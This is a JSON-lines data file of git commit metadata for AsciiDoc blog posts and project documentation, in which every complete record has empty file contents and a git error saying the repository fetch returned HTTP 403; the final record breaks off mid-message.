{"commit":"be6eb165c2bda28f8d42d7ecad448450074eb214","subject":"Update 
2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fcb68508c935062dfe53da42e33ac00f72e3f1bf","subject":"y2b create post Motoactv Unboxing \\u0026 Overview + Sports Wrist Strap","message":"y2b create post Motoactv Unboxing \\u0026 Overview + Sports Wrist Strap","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-17-Motoactv-Unboxing-u0026-Overview--Sports-Wrist-Strap.adoc","new_file":"_posts\/2011-11-17-Motoactv-Unboxing-u0026-Overview--Sports-Wrist-Strap.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8702105e6cc82195fe307b09ef96f097e7c485b","subject":"Update 2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","message":"Update 2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","new_file":"_posts\/2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c085ff624964aa5f7175772460d4fb38ae01ffb","subject":"adds v2.x.x migration guide (#442)","message":"adds v2.x.x migration guide (#442)\n\n","repos":"asciidoctor\/asciidoctor-maven-plugin,abelsromero\/asciidoctor-maven-plugin,asciidoctor\/asciidoctor-maven-plugin,abelsromero\/asciidoctor-maven-plugin,asciidoctor\/asciidoctor-maven-plugin,abelsromero\/asciidoctor-maven-plugin","old_file":"docs\/v2-migration-guide.adoc","new_file":"docs\/v2-migration-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asciidoctor\/asciidoctor-maven-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f6e5d49041bcba434bd8fb0c7d12a35fb1201d71","subject":"y2b create post Worldwide Exclusive?","message":"y2b create post Worldwide Exclusive?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-04-07-Worldwide-Exclusive.adoc","new_file":"_posts\/2015-04-07-Worldwide-Exclusive.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e094dc2b6916fd0e5cc13121acd7652d71bfd44d","subject":"Update 2015-10-05-So-close-yet-so-far.adoc","message":"Update 
2015-10-05-So-close-yet-so-far.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-05-So-close-yet-so-far.adoc","new_file":"_posts\/2015-10-05-So-close-yet-so-far.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3661a1ec3209e3436dc2a9667482e895c4b603c6","subject":"y2b create post THE 6TB MONSTER PS4","message":"y2b create post THE 6TB MONSTER PS4","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-02-24-THE-6TB-MONSTER-PS4.adoc","new_file":"_posts\/2016-02-24-THE-6TB-MONSTER-PS4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f5c0ea7fb6a50f8a298ca8518144d74a6bf514c","subject":"Update 2016-07-20-An-index-of-Ascii-Doc-syntax.adoc","message":"Update 2016-07-20-An-index-of-Ascii-Doc-syntax.adoc","repos":"spikebachman\/spikebachman.github.io,spikebachman\/spikebachman.github.io,spikebachman\/spikebachman.github.io,spikebachman\/spikebachman.github.io","old_file":"_posts\/2016-07-20-An-index-of-Ascii-Doc-syntax.adoc","new_file":"_posts\/2016-07-20-An-index-of-Ascii-Doc-syntax.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spikebachman\/spikebachman.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"44eb84d36171b9d14f94cec1b0ac040dad0e6539","subject":"Update 2016-08-10-Lightweight-Markup-Languages.adoc","message":"Update 2016-08-10-Lightweight-Markup-Languages.adoc","repos":"matthardwick\/hubpress.io,matthardwick\/hubpress.io,matthardwick\/hubpress.io,matthardwick\/hubpress.io","old_file":"_posts\/2016-08-10-Lightweight-Markup-Languages.adoc","new_file":"_posts\/2016-08-10-Lightweight-Markup-Languages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/matthardwick\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4c3dfc3c2e8cafb0fe808db4ede05cab8e8226a","subject":"Update 2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdbe7a5f1443bcd96342b37508e5c89380c97dc8","subject":"Update 2017-12-03-visual-studio-code-extension.adoc","message":"Update 
2017-12-03-visual-studio-code-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-03-visual-studio-code-extension.adoc","new_file":"_posts\/2017-12-03-visual-studio-code-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99bb6094186aa289d509422506847c26b882eaff","subject":"Update 2017-02-15-Floating-Point-Numbers.adoc","message":"Update 2017-02-15-Floating-Point-Numbers.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2017-02-15-Floating-Point-Numbers.adoc","new_file":"_posts\/2017-02-15-Floating-Point-Numbers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed58955fc00b1e606643f98f041a68fa1bcc4ac9","subject":"Adding release notes for release of revapi revapi_basic_features revapi_jackson revapi_java_spi revapi_reporter_file_base revapi_ant_task revapi_java revapi_json revapi_maven_plugin revapi_reporter_json revapi_reporter_text revapi_standalone revapi_yaml","message":"Adding release notes for release of revapi revapi_basic_features revapi_jackson revapi_java_spi revapi_reporter_file_base revapi_ant_task revapi_java revapi_json revapi_maven_plugin revapi_reporter_json revapi_reporter_text revapi_standalone revapi_yaml\n","repos":"revapi\/revapi,revapi\/revapi,revapi\/revapi","old_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210112-releases.adoc","new_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210112-releases.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/revapi\/revapi.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a03b190d6eab35d28024e518992ec51f9503aec1","subject":"Asciidoc on Sublime Text 2","message":"Asciidoc on Sublime Text 2\n","repos":"0xMF\/toybox","old_file":"captain's_log.asciidoc","new_file":"captain's_log.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"ed9d444981c4f39f2f7a3d0df943e2f649f464a5","subject":"y2b create post EXOTIC FOODS WITH AUSTIN EVANS","message":"y2b create post EXOTIC FOODS WITH AUSTIN EVANS","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-26-EXOTIC-FOODS-WITH-AUSTIN-EVANS.adoc","new_file":"_posts\/2016-10-26-EXOTIC-FOODS-WITH-AUSTIN-EVANS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"526babfe6785b9d8c66bc87364d0f8426b371f14","subject":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","message":"Update 
2016-02-03-Attention-or-Retention-or-Protention.adoc","repos":"jfavlam\/Concepts,jfavlam\/Concepts,jfavlam\/Concepts","old_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfavlam\/Concepts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41b57ca63d16e4d7027567695681b91ec94ebb83","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4375178f1375eaa2ee1441677b6054db9fe203d7","subject":"Renamed '_posts\/2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc' to '_posts\/2018-07-09-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc'","message":"Renamed '_posts\/2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc' to '_posts\/2018-07-09-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc'","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2018-07-09-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","new_file":"_posts\/2018-07-09-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37ca9769b4956c7753c816999d9231d5349a5a0a","subject":"Initial design.basics stuff","message":"Initial design.basics stuff\n","repos":"ehcache\/ehcache3,aurbroszniowski\/ehcache3,cschanck\/ehcache3,ljacomet\/ehcache3,chrisdennis\/ehcache3,AbfrmBlr\/ehcache3,rkavanap\/ehcache3,GaryWKeim\/ehcache3,chrisdennis\/ehcache3,ljacomet\/ehcache3,rkavanap\/ehcache3,ehcache\/ehcache3,GaryWKeim\/ehcache3,alexsnaps\/ehcache3,cschanck\/ehcache3,AbfrmBlr\/ehcache3,jhouserizer\/ehcache3,henri-tremblay\/ehcache3,aurbroszniowski\/ehcache3,albinsuresh\/ehcache3,lorban\/ehcache3,cljohnso\/ehcache3,lorban\/ehcache3,albinsuresh\/ehcache3,jhouserizer\/ehcache3,cljohnso\/ehcache3","old_file":"design.basics.asciidoc","new_file":"design.basics.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jhouserizer\/ehcache3.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c991f2d30a168bfcbb2fab7730bb3992c4742e28","subject":"Documentation of the mailer extension","message":"Documentation of the mailer 
extension\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/sending-emails.adoc","new_file":"docs\/src\/main\/asciidoc\/sending-emails.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"68199fa5694d250fd15a804bda6017ecbfc1ac14","subject":"Update 2018-11-25-Amazon-Go.adoc","message":"Update 2018-11-25-Amazon-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-25-Amazon-Go.adoc","new_file":"_posts\/2018-11-25-Amazon-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c879d02300e8227c77bb6b2c45f4bdaa590cb78","subject":"CL: export all symbols","message":"CL: export all symbols\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"2f69c264579e844e5eafd8da4cd5271f7fa5d848","subject":"CL - Add some good reads","message":"CL - Add some good reads\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"57f7fc060f460b48dadd746528fb79ceb57cb73c","subject":"Better code","message":"Better code\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"HTML to DOM.adoc","new_file":"HTML to DOM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30777f7f388ea10b2ad57b1af8898cc28476cdfa","subject":"Update 2015-11-10-Evolve.adoc","message":"Update 2015-11-10-Evolve.adoc","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2015-11-10-Evolve.adoc","new_file":"_posts\/2015-11-10-Evolve.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"544e70e8af43d46af8e949f522c6bb88986f1d78","subject":"Delete 2017-08-23-Kotlin.adoc","message":"Delete 
2017-08-23-Kotlin.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-23-Kotlin.adoc","new_file":"_posts\/2017-08-23-Kotlin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"009f669b3f29758f05fbdeb1879ff5f426871384","subject":"Update 2018-07-08-Gohttp.adoc","message":"Update 2018-07-08-Gohttp.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-08-Gohttp.adoc","new_file":"_posts\/2018-07-08-Gohttp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52dba2f65ac89bc6a97381b0a0e44f0ce83352b8","subject":"Update 2015-03-15-HubPress.adoc","message":"Update 2015-03-15-HubPress.adoc","repos":"hanwencheng\/hanwenblog,hanwencheng\/hanwenblog,hanwencheng\/hanwenblog","old_file":"_posts\/2015-03-15-HubPress.adoc","new_file":"_posts\/2015-03-15-HubPress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hanwencheng\/hanwenblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2662eaedd1c11e6e69fe77fb233032c6d6d8585","subject":"Update 2016-04-17-S-S-H.adoc","message":"Update 2016-04-17-S-S-H.adoc","repos":"KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io","old_file":"_posts\/2016-04-17-S-S-H.adoc","new_file":"_posts\/2016-04-17-S-S-H.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KozytyPress\/kozytypress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e6255f0d89df219dc9465424f4cb52610c0d159","subject":"Update 2016-10-11-New-Page.adoc","message":"Update 2016-10-11-New-Page.adoc","repos":"pallewela\/pallewela.github.io,pallewela\/pallewela.github.io,pallewela\/pallewela.github.io,pallewela\/pallewela.github.io","old_file":"_posts\/2016-10-11-New-Page.adoc","new_file":"_posts\/2016-10-11-New-Page.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pallewela\/pallewela.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c7ef89a44df80766e1d57a80a561f3ea0e5df3a","subject":"Update 2016-12-18-About-Me.adoc","message":"Update 2016-12-18-About-Me.adoc","repos":"chowwin\/chowwin.github.io,chowwin\/chowwin.github.io,chowwin\/chowwin.github.io,chowwin\/chowwin.github.io","old_file":"_posts\/2016-12-18-About-Me.adoc","new_file":"_posts\/2016-12-18-About-Me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chowwin\/chowwin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc69e3ed695757a8ae6babe10abeaba220619685","subject":"Update 
2017-08-16-My-Issue-with-this-Project-and-How-I-Plan-on-Fixing-It.adoc","message":"Update 2017-08-16-My-Issue-with-this-Project-and-How-I-Plan-on-Fixing-It.adoc","repos":"ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io","old_file":"_posts\/2017-08-16-My-Issue-with-this-Project-and-How-I-Plan-on-Fixing-It.adoc","new_file":"_posts\/2017-08-16-My-Issue-with-this-Project-and-How-I-Plan-on-Fixing-It.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ashelle\/ashelle.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de8061c177fe8196f0c5d547b89a3d153a046d59","subject":"Add some meat to the developing chapter, more details about the examples repo","message":"Add some meat to the developing chapter, more details about the examples repo\n\nChange-Id: I03682e83a3d939d5b7ac02fd7eed1ec22d8862c6\nReviewed-on: http:\/\/gerrit.sjc.cloudera.com:8080\/7918\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\nTested-by: jenkins\n","repos":"InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu","old_file":"docs\/developing.adoc","new_file":"docs\/developing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"22d4c290e71fde4f249676c5608be691c2ab113b","subject":"Update Yubikey_and_SSH_via_PAM.adoc","message":"Update Yubikey_and_SSH_via_PAM.adoc","repos":"eworm-de\/yubico-pam,Yubico\/yubico-pam,eworm-de\/yubico-pam,madrat-\/yubico-pam,madrat-\/yubico-pam,madrat-\/yubico-pam,Yubico\/yubico-pam,Yubico\/yubico-pam,eworm-de\/yubico-pam","old_file":"doc\/Yubikey_and_SSH_via_PAM.adoc","new_file":"doc\/Yubikey_and_SSH_via_PAM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/madrat-\/yubico-pam.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"d3fc3eca9eedd9aeb2817e8ac013453dfd2e5d14","subject":"Create set-up-kb-using-kaui.adoc","message":"Create set-up-kb-using-kaui.adoc\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/getting-started\/set-up-kb-using-kaui.adoc","new_file":"userguide\/getting-started\/set-up-kb-using-kaui.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"364ff1f584121ab741442ea09a6c9d71e46ff4a6","subject":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 
2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a1a36ab83b53e5a6b6ae1c7759db46449d5c528","subject":"Update 2016-12-2-three-dimensional-pen-of-dream.adoc","message":"Update 2016-12-2-three-dimensional-pen-of-dream.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-2-three-dimensional-pen-of-dream.adoc","new_file":"_posts\/2016-12-2-three-dimensional-pen-of-dream.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"413e582fd3524335bcf6e73d93dac346149d9130","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75b6c0e9b61b03e7c151e1308ca5004942ab159c","subject":"Update 2019-10-03-Taming-Terraform-with-Modules.adoc","message":"Update 2019-10-03-Taming-Terraform-with-Modules.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2019-10-03-Taming-Terraform-with-Modules.adoc","new_file":"_posts\/2019-10-03-Taming-Terraform-with-Modules.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysysops\/pysysops.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"900079c8b8e3217aa3c35179b1551f0182dd2674","subject":"Update 2016-02-22-Our-thoughts-on-Wonderful-World-of-Disney-Disneyland-60.adoc","message":"Update 2016-02-22-Our-thoughts-on-Wonderful-World-of-Disney-Disneyland-60.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-22-Our-thoughts-on-Wonderful-World-of-Disney-Disneyland-60.adoc","new_file":"_posts\/2016-02-22-Our-thoughts-on-Wonderful-World-of-Disney-Disneyland-60.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"83584a2c9cb8a96bedf7bc7e37307f261587d3cd","subject":"Renamed 
'_posts\/2017-XX-XX-Testing-puppet-agent-on-Windows-to-create-on-Ubuntu.adoc' to '_posts\/2017-XX-XX-Testing-puppet-agent-on-Windows-to-create-Ubuntu-package.adoc'","message":"Renamed '_posts\/2017-XX-XX-Testing-puppet-agent-on-Windows-to-create-on-Ubuntu.adoc' to '_posts\/2017-XX-XX-Testing-puppet-agent-on-Windows-to-create-Ubuntu-package.adoc'","repos":"nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io","old_file":"_posts\/2017-XX-XX-Testing-puppet-agent-on-Windows-to-create-Ubuntu-package.adoc","new_file":"_posts\/2017-XX-XX-Testing-puppet-agent-on-Windows-to-create-Ubuntu-package.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nnn-dev\/nnn-dev.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89c9f622ac3df3c6c42f0ecdfb2f3645425ba8a2","subject":"Updated to address point (a) of Heiko's comments - but will leave (b) as it is explained in text","message":"Updated to address point (a) of Heiko's comments - but will leave (b) as it is explained in 